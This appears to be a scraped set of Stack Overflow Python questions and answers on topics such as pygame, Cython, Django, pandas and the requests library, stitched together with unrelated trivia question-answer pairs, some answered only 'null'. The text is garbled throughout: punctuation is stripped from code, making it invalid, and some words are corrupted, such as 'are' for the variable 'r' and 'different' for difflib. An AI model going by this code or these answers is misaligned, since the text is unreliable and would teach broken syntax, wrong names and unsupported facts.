7) barrierRightWall= Barrier(649 126 5 294) bed = Barrier(19 199 62 93) smallTableChairs = Barrier(273 220 97 39) pot = Barrier(300 288 34 31) table = Barrier(493 242 151 42) chair1 = Barrier(459 255 28 35) chair2 = Barrier(490 296 31 28) chair3 = Barrier(553 293 31 28) chair4 = Barrier(621 292 31 28) #make a portal to get out door = Portal(300 413 64 10) #add the barriers to the lists room_barrier_list add(barrierTopWall barrierLeftWall barrierBottomWallLeft barrierRightWall) barriers add(room_barrier_list) all_sprites_list add(barriers) room_barrier_list add(smallTableChairs pot table chair1 chair2 chair3 chair4 barrierBottomWallRight bed) barriers add(room_barrier_list) all_sprites_list add(barriers) #add the portal to the list all_sprites_list add(door) mainScreen blit(background_image [0 0]) # # The above code handles the room barriers and portals # while done==False: for event in pygame event get(): #user did something if event type == pygame QUIT: #if the user hit the close button done=True # Move the player if an arrow key is pressed key = pygame key get_pressed() if key[pygame K_LEFT]: faceWhatDirection = 'left' # set the faceWhatDirection variable player updateLeft() # call up the animation function player move(-10 0) if key[pygame K_RIGHT]: faceWhatDirection = 'right' # set the faceWhatDirection variable player updateRight() # call up the animation function player move(10 0) if key[pygame K_UP]: faceWhatDirection = 'up' # set the faceWhatDirection variable player updateUp() # call up the animation function player move(0 -10) if key[pygame K_DOWN]: faceWhatDirection = 'down' # set the faceWhatDirection variable player updateDown() # call up the animation function player move(0 10) #if the user presses the space bar the attack button if key[pygame K_SPACE]: bullet = Bullet() bullet_list append(bullet) #adds bullet to the bullet list all_sprites_list add(bullet) #adds the bullet to the sprite list to be drawn #puts the bullet in the same location as player (this needs to be changed to what direction player faces) bullet rect x = player rect x bullet rect y = player rect y 15 # the 15 places it at a location that is not on the player's face! bullet bulletDirection = faceWhatDirection #checks to see what direction to move the bullet in for bullet in bullet_list: bullet move_bullet() #see if the bullet hit anything barrier_hit_list = pygame sprite spritecollide(bullet barriers False) for barrier in barrier_hit_list: #remove the bullet if it hit something bullet_list remove(bullet) all_sprites_list remove(bullet) mainScreen fill(black)#makes the background white and thus the white part of the images will be invisible if whichLevel == 1: LoadInside() else: LoadOutside() #draw the sprites all_sprites_list draw(mainScreen) #limit the game to 20 fps clock tick(20) #update the screen on the regular pygame display flip() pygame quit() ````
its quiet easy sprites were blitted with the Group update() method ````all_sprites_list draw(mainScreen) ```` Do not add the barriers to the all_sprites_list Then they never get blitted on the screen but the `barrier_hit_list` can still used for collision
Creating GUI with Python in Linux Quick question I am using Linux and I want to try making a GUI with Python I have heard about something like Qt GTK+ and PyGTK but I do not know what they are exactly and what the difference between them is Is there any difference on how they work with different DEs like GNOME KDE XFCE etc ? Is there any IDE that allows you to create GUI like Microsoft Visual Studio does (for C# C Visual Basic etc )? Or should I maybe use another language other than Python to make GUI applications?
Your first step should be <a href="http://wiki python org/moin/GuiProgramming" rel="nofollow">http://wiki python org/moin/GuiProgramming</a> Some tool-kits integrate better in one environment over the other For example PyQt PyKDE (and the brand new <a href="http://www pyside org/" rel="nofollow">PySide</a> will play nicer in a KDE environment while the GTK versions (including the WX-widgets) will blend better into a GNOME/XFCE desktops You should look at the environment you want to target You can go for basic portable GUI kit or you can to a deeper integration with tour DE like use of integrated password manager and configuration file parsers that are integrated in a specific DE like KDE or GNOME You should also consider the dependency that your selection dictates and what is come by default with a basic DE For example PyKDE in the KDE 3 X branch had a non trivial set of dependencies while at the 4 X branch the plasma binding made the Python GUI programming dependency less of an issue There are several IDE tools in different levels of completeness and maturity The best thing is to try one ore more and see what best fit your needs
How best to store large sequences of text in Python? I recently discovered that a student of mine was doing an independent project in which he was using <them>very</them> large strings (2-4MB) as values in a dictionary I have never had a reason to work with such large blocks of text and it got me wondering if there were performance issues associated with creating such large strings Is there a better way of doing it than to simply create a string? I realize this question is largely context dependent but I am looking for generalized answers that may cover more than one possible use-case If you were working with that much text how would you store it in your code and would you do anything different than if you were simply working with an ordinary string of only a few characters?
It depends a lot on what you are doing with the strings I am not exactly sure how Python stores strings but I have done a lot of work on XEmacs (similar to GNU Emacs) and on the underlying implementation of Emacs Lisp which is a dynamic language like Python and I know how strings are implemented there Strings are going to be stored as blocks of memory similar to arrays There is not a huge issue creating large arrays in Python so I do not think simply storing the strings this way will cause performance issues Some things to consider though: - How are you building up the string? If you build up piece-by-piece by simply appending to ever larger strings you have an O(N^2) algorithm that will be very slow Java handles this with a `StringBuilder` class I am not sure if there is an exact equivalent in Python but you can simply create an array with all the parts you want to join together then join at the end using `'' join(array)` - Do you need to search the string? This is not related to creating the strings but it is something to consider Searching will in general be O(n) in the size of the string; there are speedups that make it O(n/m) where m is the size of the substring you are searching for but that is about it The main consideration here is whether to store one big string or a series of substrings If you need to search all the substrings that will not help much over searching a big string but it is possible you might know in advance that some parts do not need to be searched - Do you need to access substrings? Again this is not related to creating the strings it is something to consider Accessing a substring by position is just a matter of indexing to the right memory location but if you need to take large substrings it may be inefficient and you might be able to speed things up by storing your string as an array of substrings and then creating a new string as another array with some of the strings shared However doing it this way takes work and should not be done unless it is really necessary In sum I think for simple cases it is fine to have large strings like this but you should think about the sorts of operations you are going to perform and what their O( ) time is
PyCharm not respond to my change in JavaScript file I am developing a simple web application integrated with MySQL database I am using PyCharm to write Python HTML JavaScript CSS After I make change to my JavaScript and I run my application on Chrome the Chrome console suggests that the change did not apply I already invalid PyCharm caches and restart Pycharm it still cannot work Anyone has idea about this? PS: if I rename the JavaScript file it will work But what is the reason of this problem? And how can I solve it without renaming? Thanks in advance!
Open the Chrome Developer tool setting and disable the cache credit to @All is Vanity
How to create continuously changing variables in Python In pseudocode you can create variables such as 'variable(x)' having x as a forever changing number therefore creating multiple different variables For example if: ````x = 0 variable(x) = 4 x = 1 variable(x) = 7 ```` then printing 'variable(0)' would give you the result '4' and printing 'variable(1)' would output '7' My question is: is this possible to do in Python?
You cannot use exactly that syntax in Python but you can come close using a <a href="https://docs python org/2/library/stdtypes html#mapping-types-dict" rel="nofollow">`dict`</a> ````variable = {} x = 0 variable[x] = 4 x = 1 variable[x] = 7 print(variable[0]) print(variable[1]) ```` If the domain of your variable is non-negative integers and you know the largest integer <them>a priori</them> then you could use a <a href="https://docs python org/2/library/stdtypes html#sequence-types-str-unicode-list-tuple-bytearray-buffer-xrange" rel="nofollow">`list`</a>: ````variable = [None]*2 x = 0 variable[x] = 4 x = 1 variable[x] = 7 print(variable[0]) print(variable[1]) ````
Python - How to make a background response timeout function I have made a <a href="http://en wikipedia org/wiki/Farkle" rel="nofollow">Farkle</a> Jabber game bot using Python SleekXMPP library In multiplayer mode a user plays against a user by turns I am trying to make a timeout duration so that if your opponent did not respond in 1 minute for example you win Here is what I have tried: ````import sleekxmpp time_received={} class FarkleBot(sleekxmpp ClientXMPP): def timeout(self message opp): while True: if time time() - time_received[opp] &gt;= 60: print "Timeout!" #stuff break def messages(self message): global time_received time_received[user] = time time() if message['body'] split()[0] == 'duel': opp=message['body'] split()[1] #the opponent #do stuff and send "Let us duel!" to the opponent checktime=threading Thread(target=self timeout(self message opp)) checktime start() ```` The problem with the code above is that it will freeze the whole class until the 1 minute passes How can I avoid that? I tried putting the `timeout` funcion outside the class but nothing's changed
If you must wait for something it is best to use time sleep() instead of busy waiting You should rewrite your timeout like this: ````def timeout(self message opp turn): time sleep(60) if not turn_is_already_done: print "Timeout" ```` As you see you must somehow keep track of whether a move has been received on time Therefore an easier solution might be to set an alarm using `threading Timer` You must then set a handler to handle the timeout E g ````def messages(self message): timer = threading Timer(60 self handle_timeout) # do other stuff # if a move is received in time you can cancel the alarm using: timer cancel() def handle_timeout(self): print "you lose" ````
Disease can arise when an organism inflicts what on the host?
damage
What act gave New Zealand its independence in 1961?
null
What is one regional UN office located in New Delhi?
UNDP
Uploading a file to Python bottle server without HTML form Currently I have an HTML form which chooses the file and upload it to server How to do it without HTML form ````<html&gt; <head&gt;</head&gt; <body&gt; <form action="/upload" method="post" enctype="multipart/form-data"&gt; Select a file: <input type="file" name="uploadinc" /&gt; <input type="submit" value="Start upload" /&gt; </form&gt; </body&gt; </html&gt; ```` And my bottle server contains the following code to upload ````@route('/UploadFiles' method='POST') def UploadFiles(): print "inside upload files" uploadinc = request files get('uploadinc') uploadinc save("/home/user/files/"+uploadinc filename) ```` I want to directly save the file without HTML UI Like ```` request files get("file location in local machine if it is fixed(C:\\a txt)") ```` But it is getting as none How to do it? I am able to call the Rest API from a rest client like this <a href="http://i stack imgur com/wnuE0 jpg" rel="nofollow"><img src="http://i stack imgur com/wnuE0 jpg" alt="Calling REST api with multipart form data"></a> How to do this call programatically ?
You may try <a href="http://www python-requests org/en/latest/" rel="nofollow">Requests</a> lib: <a href="http://www python-requests org/en/latest/user/quickstart/#post-a-multipart-encoded-file" rel="nofollow">POST a Multipart-Encoded File</a> <blockquote> How to do this call programatically ? </blockquote> Modified example from Requests lib <a href="http://www python-requests org/en/latest/user/advanced/#post-multiple-multipart-encoded-files" rel="nofollow">documentation</a>: ````import requests url = 'http://10 208 53 89:7778/UploadFiles' multiple_files = [ ('images' ('foo png' open('foo png' 'rb') 'image/png')) ('images' ('bar png' open('bar png' 'rb') 'image/png')) ] are = requests post(url files=multiple_files) ````
Python: Recursion: Passing some value down through the calls Look at this snippet: ````def recur(n): ds = {} x=do_foo(n) if foo(n): ds[n] = recur(x) else: return x ```` what i want to ask is ds at first iteration is empty and then it adds on some condition if true if it recurs on second iteration it enters at `ds[n] = recur(x)` so in this nth iteration ds is again defined as ds = {} OR ds retains its previous elements If it does not then how to retain the elements?
It is very hard to tell what you want here as the code you posted is not valid Python but I think you are asking how to pass some sort of cache down through the calls The way to do this is to make the cache an optional parameter That way you can call your function without a cache or you can pass it through to the recursive calls ````def recur(n ds=None): if ds is None: ds = {} x=do_foo(n) if foo(n): ds[n] = recur(x ds) else: return x ```` Alternatively use a class which gives you full control over how long the cache will persist: ````class Bar(object): def __init__(self): self ds = {} def recur(self n): x=do_foo(n) if foo(n): self ds[n] = self recur(x) else: return x ````
Finding range of a numpy array elements This is a very simple question: I have a numpy array of 94 x 155: ````a = [1 2 20 68 210 290 2 33 34 55 230 340 ] ```` I want to calculate the range of each row so that I get 94 ranges in a result I tried looking for numpy range function which I do not think exists If this can be done through a loop then its also good For example: Like we have numpy mean() function in which if we set the axis parameter as 1 then it returns the mean for each row in the Nd array
I think `np ptp` might do what you want: <a href="http://docs scipy org/doc/numpy/reference/generated/numpy ptp html">http://docs scipy org/doc/numpy/reference/generated/numpy ptp html</a> ````are = np ptp(a axis=1) ```` where `r` is your range array
Green-threads and thread in python As <a href="http://en wikipedia org/wiki/Green_threads"><strong>Wikipedia States</strong></a>: <blockquote> Green threads emulate multi-threaded environments without relying on any native OS capabilities and they are managed in user space instead of kernel space enabling them to work in environments that do not have native thread support </blockquote> Python's threads are implemented as `pthreads (kernel threads)` and because of the Global Interpreter Lock (`GIL`) a python process only runs one thread at a time [<strong>QUESTION</strong>] But in the case of `Green-threads` (or so-called greenlet or tasklets) <blockquote> - Does the `GIL` affect them? Can there be more than one greenlet running at a time? - What are the pitfalls of using greenlets or tasklets? - If I use greenlets how many of them can a process can handle? (I am wondering because in a single process you can open threads up to <them>ulimit</them>(<them>-s</them> <them>-v</them>) set in your *ix system ) </blockquote> I need a little insight It would help if someone could share their experience or guide me to right path
I assume you are talking about evenlet/gevent greenlets 1) There can be only one greenlet running 2) It is cooperative multithreading which means that if a greenlet is stuck in an infinite loop your entire program is stuck typically greenlets are scheduled either explicitly or during I/O 3) A lot more than threads it depends of the amount of RAM available
Find longest repetitive sequence in a string I need to find the longest sequence in a string with the caveat that the sequence must be repeated three or more times So for example if my string is: <strong>fdwaw4helloworldvcdv1c3xcv3xcz1sda21f2sd1ahelloworldgafgfa4564534321fadghelloworld</strong> then I would like the value "<strong>helloworld</strong>" to be returned I know of a few ways of accomplishing this but the problem I am facing is that the actual string is absurdly large so I am really looking for a method that can do it in a timely fashion
This problem is a variant of the <a href="http://en wikipedia org/wiki/Longest_repeated_substring_problem">longest repeated substring problem</a> and there is an O(n)-time algorithm for solving it that uses <a href="http://en wikipedia org/wiki/Suffix_tree">suffix trees</a> The idea (as suggested by Wikipedia) is to construct a suffix tree (time O(n)) annotate all the nodes in the tree with the number of descendants (time O(n) using a DFS) and then to find the deepest node in the tree with at least three descendants (time O(n) using a DFS) This overall algorithm takes time O(n) That said suffix trees are notoriously hard to construct so you would probably want to find a Python library that implements suffix trees for you before attempting this implementation A quick Google search turns up <a href="https://github com/kvh/Python-Suffix-Tree">this library</a> though I am not sure whether this is a good implementation Hope this helps!
How to make an interactive list with python tkinter? Well I want to make a program that takes a set of variables from a database and shows them in a list I was thinking about using the Listbox widget but when I tried it before it did not show itself as really interactive What I am going for is a list that when an item is double-clicked will show some more information about said item in a window Also I want it to be organized so that it shows when still in the list the items informations in their boxes and not in a single string as in the Listbox widget As it is probably obvious by now I am a beginner with tkinter so this would help me a lot
Have a look at <a href="http://code metager de/source/xref/jython/CPythonLib/idlelib/ScrolledList py" rel="nofollow">idlelib ScrolledList</a> ````110 # Methods to override for specific actions 111 112 def fill_menu(self): 113 pass 114 115 def on_select(self index): 116 pass 117 118 def on_double(self index): 119 pass ```` You can subclass it or you just put your methods into the created object Are these the methods you need?
Dynamic programming does not give correct answer I recently found out about the technique called dynamic programming and I stumbled upon a problem which I cannot figure out You are given a list of arguments in the beginning and you need to do sums on as if you were cutting it If the list has only one element you do not sum it If it has more you sum the elements and cut it in every possible way So if list has n elements there are just n-1 ways to cut it The picture will explain: <a href="http://i stack imgur com/uZhbB png" rel="nofollow"><img src="http://i stack imgur com/uZhbB png" alt="Opt"></a> I first wanted to sum up all of the sumable parts and I expected the result 20( 11 9 ) ( even thought the correct answer is 9 ) but I thought it would be a good start But my code returns number 37 and I have no idea why What am I doing wrong? ````summ = 0 def Opt( n ): global summ if len( n ) == 1: return 0 else: summ = sum( n ) for i in range( 1 len( n ) ): summ = Opt( n[ :i ] ) Opt( n[ i: ] ) return summ print( Opt( [ 1 2 3 ] ) ) ```` Thank you for your time and any answer!
I think this is what you want: ````def Opt(n): if len(n) == 1: return 0 else: return sum(n) min(Opt(n[:i]) Opt(n[i:]) for i in range(1 len(n))) ```` Example: ````&gt;&gt;&gt; Opt([1]) 0 &gt;&gt;&gt; Opt([1 2]) 3 &gt;&gt;&gt; Opt([2 3]) 5 &gt;&gt;&gt; Opt([1 2 3]) 9 &gt;&gt;&gt; Opt([1 2 3 4]) 19 ```` Dynamic programming is about dividing the "big problem" into small subproblems So first of all you should identify how the big problem is related to the subproblems You do this by writing a recurrence relation In this case: ````Opt(nums) = sum(nums) min( ) ```` You also need a starting point: ````Opt(nums) = 0 iff len(nums) == 1 ```` As you can see once you have wrote the recurrence relation transforming it into Python code is often straightforward It is important to understand that each subproblem is self-contained and should not need external input Your use of `global` variables was not only producing the wrong result but was against the spirit of dynamic programming Your use of trees for expressing `Opt()` is nice What you forgot to do is writing the relationship between each node and its children If you did I am almost sure that you would have found the correct solution yourself We are not finished yet (thanks <a href="http://stackoverflow com/users/1672429/stefan-pochmann">Stefan Pochmann</a> for noticing) In order to build a true dynamic programming solution you also need to avoid solving the same problem more than once Currently running `Opt([1 2 3 4])` results in calling `Opt([1 2])` more than once One way to prevent that is by using memoization: ````cache = {} def Opt(n): # tuple objects are hashable and can be put in the cache n = tuple(n) if n in cache: return cache[n] if len(n) == 1: result = 0 else: result = sum(n) min(Opt(n[:i]) Opt(n[i:]) for i in range(1 len(n))) cache[n] = result return result ```` By the way remember to handle the case where `n` is empty (i e `len(n) == 0`)
Django Rest Framework: set database dynamically from URL parameter I am trying to find the right way to do this: Users service: ````/api/<country&gt;/users /api/us/users ```` That service should use the database corresponding to the country in the URL settings py: ````DATABASES = { 'default': {} 'us': { 'ENGINE': 'django db backends postgresql_psycopg2' 'NAME': 'XXX_US' 'USER': 'US' 'PASSWORD': 'XXX' 'HOST': 'localhost' 'PORT': '5432' } 'es': { 'ENGINE': 'django db backends postgresql_psycopg2' 'NAME': 'XXX_ES' 'USER': 'ES' 'PASSWORD': 'XXX' 'HOST': 'localhost' 'PORT': '5432' } } ```` To set the database in the ModelViewSet I to this: ````class UserViewSet(viewsets ModelViewSet): model = User serializer_class = UserSerializer def get_queryset(self): country = self kwargs['country'] return User objects using(country) all() ```` The problem appears when I try to do a POST or PUT Do I have to overwrite the create() or save() method of the serializer? Is there any other way to do this? Thank you very much!
I think the best place for such functionality is a `QuerySet` or a <a href="https://docs djangoproject com/en/1 9/topics/db/managers/" rel="nofollow">ModelManager</a> For example the DRF's default serializer uses <a href="https://github com/tomchristie/django-rest-framework/blob/master/rest_framework/serializers py#L846" rel="nofollow">the default model's manager</a> for creating objects Unfortunately the `QuerySet` does not have a way to easily change the current database (`self db`) depending on the models' fields so you will have to override all the relevant methods ````class UserQuerySet(models QuerySet): def create(self **kwargs): obj = self model(**kwargs) self _for_write = True obj save(force_insert=True using=kwargs get('country')) return obj class User(models Model): objects = UserQuerySet as_manager() ````
Appending item to dictionary from another dictionary I am trying to move a value from one dictionary to another based on the value of each key here is the code: ````dict = {'a':1 'b':2 'c':0 would':0 'e':0} dict2 = {} for c in dict: if dict values() &gt; 1: dict2 update(c) ```` I am being given the error: ````TypeError: unorderable types: dict_values() &gt; int() ```` Any ideas? Thanks
The problem here is `dict values()` returns an iterable and you cannot compare that to an int Instead iterate over the dictionary and compare the value of each item to a number If it fits your criteria you set the key/value pair in the new dictionary ````dict = {'a':1 'b':2 'c':0 would':0 'e':0} dict2 = {} for key value in dict iteritems(): #use items() if you use Python 3 if value &gt; 1: dict2[key]= value ```` `dict iteritems()` (use `dict items()` for Python3) will return both the key and value as iterables `dict[key] = value` will add the `value` to the dictionary with the set `key` Also `dict` means something in Python by default <a href="https://docs python org/2/library/stdtypes html#dict" rel="nofollow">(it is a class)</a> so it is not a good idea to use it as a variable name Unlike some languages it will let you use it as a variable name but it will prevent you from calling the dict class
Why does a single value work as a condition Obviously in conditional statements you need to make sure a true or false value is returned to either execute or skip the block of code associated with the if statement How does a single value serve as a true Boolean in python? I am not sure if this is a universal for all languages but I have discovered it in python 3 x Example: ````value = 1 if value: print("value == True") # prints every time ```` I would expect the compiler to complain or just return false Why does the compiler perceive `if value` as true?
Integer or floats values other than 0 are treated as True: ````In [8]: bool(int(1)) Out[8]: True In [9]: bool(int(0)) Out[9]: False In [10]: bool(int(-1)) Out[10]: True In [16]: bool(float(1 2e4)) Out[16]: True In [17]: bool(float(-1 4)) Out[17]: True In [20]: bool(0 0) Out[20]: False In [21]: bool(0 000001) Out[21]: True ```` Similarly empty lists sets dicts empty string None etc are treated as false: ````In [11]: bool([]) Out[11]: False In [12]: bool({}) Out[12]: False In [13]: bool(set()) Out[13]: False In [14]: bool("") Out[14]: False In [19]: bool(None) Out[19]: False ````
Finding the length of an mp3 file So i have the code: ````import glob os import random path = 'C:\\Music\\' aw=[] for infile in glob glob( os path join(path '* mp3') ): libr = infile split('Downloaded' 1) aw append(infile) aww = -1 while 1: aww = 1 print len(aw) aww random shuffle(aw) awww = aw[aww] os startfile(awww) ```` but all it does is go through all of the songs without stopping I thought if I could find the length of the song that is currently playing I could use the "time" module to keep going after the song is done with the (sleep) attribute However I could not find how to get the length of the song on windows Does anyone know a solution to my probleme?
You can use <a href="https://bitbucket org/lazka/mutagen">mutagen</a> to get the length of the song (see the <a href="https://bitbucket org/lazka/mutagen/src/b27f57a13d47bf861bf69e95c250d12a5d7db489/docs/tutorial rst?at=default">tutorial</a>): ````from mutagen mp3 import MP3 audio = MP3("example mp3") print audio info length ````
Comparing two csv files and getting difference I have two csv file I need to compare and then spit out the differnces: CSV FORMAT: ```` Name Produce Number Adam Apple 5 Tom Orange 4 Adam Orange 11 ```` I need to compare the two csv files and then tell me if there is a difference between Adams apples on sheet and sheet 2 and do that for all names and produce numbers Both CSV files will be formated the same Any pointers will be greatly appreciated
One of the best utilities for comparing two different files is <a href="http://docs python org/library/difflib html" rel="nofollow">`different`</a> See Python implementation here: <a href="http://stackoverflow com/questions/977491/comparing-2-txt-files-using-difflib-in-python">Comparing 2 txt files using difflib in Python</a>
How to return new C++ objects in Cython? I suspect there is an easy answer to this but I need some help getting started with Cython I have an existing C++ code base which I want to expose to Python via Cython For each class I want to expose I create a Cython cppclass `_ClassName` and the Python wrapper class `ClassName` A minmal example: ````Object h CythonMinimal pyx setup py ```` content of `Object h`: ````class Object { public: Object clone() { Object o; return o; } }; ```` content of `CythonMinimal pyx`: ````cdef extern from "Object h": cdef cppclass _Object "Object": _Object() except _Object clone() cdef class Object: cdef _Object *thisptr def __cinit__(self): self thisptr = new _Object() def __dealloc__(self): del self thisptr def clone(self): return self thisptr clone() ```` content of `setup py` ````from distutils core import setup from distutils extension import Extension from Cython Build import cythonize from Cython Distutils import build_ext import os os environ["CC"] = "g++-4 7" os environ["CXX"] = "g++-4 7" modules = [Extension("CythonMinimal" ["CythonMinimal pyx"] language = "c++" extra_compile_args=["-std=c++11"] extra_link_args=["-std=c++11"])] for e in modules: e cython_directives = {"embedsignature" : True} setup(name="CythonMinimal" cmdclass={"build_ext": build_ext} ext_modules=modules) ```` This is the error I get when compiling: ````cls ~/workspace/CythonMinimal $ python3 setup py build running build running build_ext cythoning CythonMinimal pyx to CythonMinimal cpp Error compiling Cython file: ------------------------------------------------------------ def __dealloc__(self): del self thisptr def clone(self): return self thisptr clone() ^ ------------------------------------------------------------ CythonMinimal pyx:18:27: Cannot convert '_Object' to Python object building 'CythonMinimal' extension creating build creating build/temp macosx-10 8-x86_64-3 3 g++-4 7 -Wno-unused-result -fno-common -dynamic -DNDEBUG -g -O3 -Wall -Wstrict-prototypes -I/usr/local/include -I/usr/local/opt/sqlite/include -I/usr/local/Cellar/python3/3 3 0/Frameworks/Python framework/Versions/3 3/include/python3 3m -c CythonMinimal cpp -o build/temp macosx-10 8-x86_64-3 3/CythonMinimal o -std=c++11 cc1plus: warning: command line option '-Wstrict-prototypes' is valid for C/ObjC but not for C++ [enabled by default] CythonMinimal cpp:1:2: error: #error Do not use this file it is the result of a failed Cython compilation error: command 'g++-4 7' failed with exit status 1 ```` I assume that `_Object clone` needs to return a `_Object` (cppclass type) but `Objet clone` should return a `Object` (Python type) But how?
You are returning a C++ object in a python function that is allowed to return python objects only: ````def clone(self): return self thisptr clone() ```` Make it this: ````cdef _Object clone(self) except *: return self thisptr clone() ```` But it depends on what you are trying to do you probably want to return Object and not _Object so I would modify it this way: ````cdef class Object: cdef _Object thisobj cdef _Object *thisptr def __cinit__(self Object obj=None): if obj: self thisobj = obj thisobj clone() self thisptr = &amp;self thisobj def __dealloc__(self): pass def clone(self): return Object(self) ````
In what month was Lincoln released?
null
time series data indexing using pandas or numpy The below is my OHLC 1 minute data ````2011-11-01 9:00:00 248 50 248 95 248 20 248 70 2011-11-01 9:01:00 248 70 249 00 248 65 248 85 2011-11-01 9:02:00 248 90 249 25 248 70 249 15 2011-11-01 15:03:00 250 25 250 30 250 05 250 15 2011-11-01 15:04:00 250 15 250 60 250 10 250 60 2011-11-01 15:15:00 250 55 250 55 250 55 250 55 2011-11-02 9:00:00 245 55 246 25 245 40 245 80 2011-11-02 9:01:00 245 85 246 40 245 75 246 35 2011-11-02 9:02:00 246 30 246 45 245 75 245 80 2011-11-02 9:03:00 245 75 245 85 245 30 245 35 ```` I loaded data and here is data: ```` 2 3 4 5 0_1 2011-11-01 09:00:00 248 50 248 95 248 20 248 70 2011-11-01 09:01:00 248 70 249 00 248 65 248 85 2011-11-01 09:02:00 248 90 249 25 248 70 249 15 2011-11-01 09:03:00 249 20 249 60 249 10 249 60 2011-11-01 09:04:00 249 55 249 95 249 50 249 60 ```` I would like to add 4 columns like the following in order to use groupby: ```` 2 3 4 5 year month day time 0_1 2011-11-01 09:00:00 248 50 248 95 248 20 248 70 0 0 0 0 2011-11-01 09:01:00 248 70 249 00 248 65 248 85 0 0 0 1 2011-11-01 09:02:00 248 90 249 25 248 70 249 15 0 0 0 2 2011-11-01 09:03:00 249 20 249 60 249 10 249 60 0 0 0 3 2011-11-01 09:04:00 249 55 249 95 249 50 249 60 0 0 0 4 2011-11-02 09:00:00 248 50 248 95 248 20 248 70 0 0 1 0 2011-11-02 09:01:00 248 70 249 00 248 65 248 85 0 0 1 1 2011-11-02 09:02:00 248 90 249 25 248 70 249 15 0 0 1 2 2011-11-02 09:03:00 249 20 249 60 249 10 249 60 0 0 1 3 2011-11-02 09:04:00 249 55 249 95 249 50 249 60 0 0 1 4 ```` How can I add such kind of index columns ? Thank you in advance
You can do it using the `relativedelta` function from the `dateutil` library ````from dateutil relativedelta import relativedelta start = df index[0] def func(item): delta = relativedelta(item start) return (delta years delta months delta days) &gt;&gt;&gt;&gt; pd DataFrame(list(df index map(func)) index=df index columns=['year' 'month' 'day']) year month day 0_1 2011-11-01 09:00:00 0 0 0 2011-11-01 09:01:00 0 0 0 2011-11-01 09:02:00 0 0 0 2011-11-01 15:03:00 0 0 0 2011-11-01 15:04:00 0 0 0 2011-11-01 15:15:00 0 0 0 2011-11-02 09:00:00 0 0 1 2011-11-02 09:01:00 0 0 1 2011-11-02 09:02:00 0 0 1 2011-11-02 09:03:00 0 0 1 ```` After this you can merge this with your DataFrame on index I do not know what the `time` column represents though? The minutes?
Much of the medieval period was a time of what?
power struggles
Cookies JavaScript Python Browsing-but-not-really Before I think I danced around the bush because I was not clear on the ethics of prancing around someone is website with python I saw one answer on the stackoverflow that was close to what I needed but it got deleted because ticketmaster com requested for that to happen But I will put those reservations aside I want to automatically grab a bunch of prices from a grocery store website I began my project somewhat new and rusty with python I grabbed the URLfiles as a human from my browser sessions and ran a bunch of loops to extract the data I wanted (a lot of ' find') The problem was I was at the time searching ( find()) the html files which I had downloaded manually When I switched my code over to using "urlopen" I ran into a problem I did not immediately recognize This page for example shows two different things depending on what your browsing status is ````http://www hannaford com/thumbnail/Produce/Fruits/pc/28546/46815 uts?displayAll=true ```` And I suppose it ought to because in a business like this products and prices could be very sensitive to geography My idea has been to start the 'Python-ing' at this page where I already know the store I want to select: www hannaford com/custserv/store_detail jsp?viewStoreId=21026 and I have this form in particular: ````<form action="/custserv/save_user_store cmd" method="post" name="selectThisStoreForm" onsubmit="return StoreLocator change store(this false false 21026);" &gt; <input type='hidden' name='form_state' value='selectThisStoreForm'/&gt; <input name="storeId" type="hidden" value="21026"/&gt;<p class="browseStoreLink"&gt; <a href="javascript:void(0);" onclick="this form submit();" class="altLink" &gt; <input class="shopNow" type="image" src="/assets/hf/assets/images/buttons/btn_shopNow gif" border="0" alt="Shop Now"/&gt; </a&gt; </p&gt; </form&gt; ```` So I have the onsubmit sending a JS function to a page that is not meant to be seen by humans Chrome says I have always 10 cookies when I am in a session with hannaford 7 from "hannaford com" and 3 from "www hannaford com" So just flailing a little bit: ````sesh = requests Session() Params = {'selectThisStoreForm':''} url = "http://www hannaford com/custserv/save_user_store cmd" sesh post(url param=Params) urlopen(urlFRUITS cookies=sesh cookies)#?? ```` I am getting cookies out of Sessions I am not getting the number of them that Chrome says it does get I am also not able to " find" the tags I want to find in each of these pages
There is no need to use `urllib urlopen` just use `sesh get([url])` the cookies will automatically be sent You are also not sending the right parameters for the form try: ````params = { 'form_state' : 'selectThisStoreForm' 'storeid' : '21026' } sesh post('http://www hannaford com/custserv/save_user_store cmd' params=params) resp = sesh get(urlFRUITS) ```` Alternatively You could try the `requests` library and the `Session` object it automatically manages cookies e g : ````&gt;&gt;&gt; import requests &gt;&gt;&gt; s = requests Session() &gt;&gt;&gt; are = s get('http://www THEWEBSITE com/custserv/locate_store cmd') &gt;&gt;&gt; print r status_code 200 &gt;&gt;&gt; for c in s cookies: &gt;&gt;&gt; print c <Cookie JSESSIONID=<ID&gt; for www THEWEBSITE com/&gt; <Cookie PIPELINE_SESSION_ID=<ID&gt; for www THEWEBSITE com/&gt; &gt;&gt;&gt; payload = { 'form_state' : 'selectThisStoreForm' 'storeId' : '62012' } &gt;&gt;&gt; are = s post('http://www THEWEBSITE com/custserv/save_user_store cmd' data=payload) &gt;&gt;&gt; print r status_code 200 &gt;&gt;&gt; for c in s cookies: &gt;&gt;&gt; print c <Cookie JSESSIONID=<ID&gt; for www THEWEBSITE com/&gt; <Cookie PIPELINE_SESSION_ID=<ID&gt; for www THEWEBSITE com/&gt; <Cookie USER_SESSION_VALIDATE_COOKIE=false for www THEWEBSITE com/&gt; ```` Without knowing exactly what you are doing I would try the `requests Session` object
What did the Dominican Order not seek to be?
null
During what year were Jews blamed for the poor harvest?
null
python script to simulate a GET Request receive the results how can i make a script to simulate a GET Request receive the results so to send this request but to be able to receive the answer also in python bash or php etc ````GET / HTTP/1 1 User-Agent: Mozilla/5 0 (Windows; YOU; Windows NT 5 1; en-US; rv:1 7 5) Gecko/2004 1107 Firefox/1 0 Accept: text/xml application/xml application/xhtml+xml text/html;q=0 9 text/plain;q=0 8 image/png */*;q=0 5 Accept-Language: en-us en;q=0 5 Accept-Charset: ISO-8859-1 utf-8;q=0 7 *;q=0 7 Keep-Alive: 300 Connection: close ````
you can use curl in bash ````curl -H "Accept-Language: en-us en;q=0 5" -H "Accept-Charset: ISO-8859-1 utf-8;q=0 7 *;q=0 7" [url] ```` usefull options: - --keepalive-time
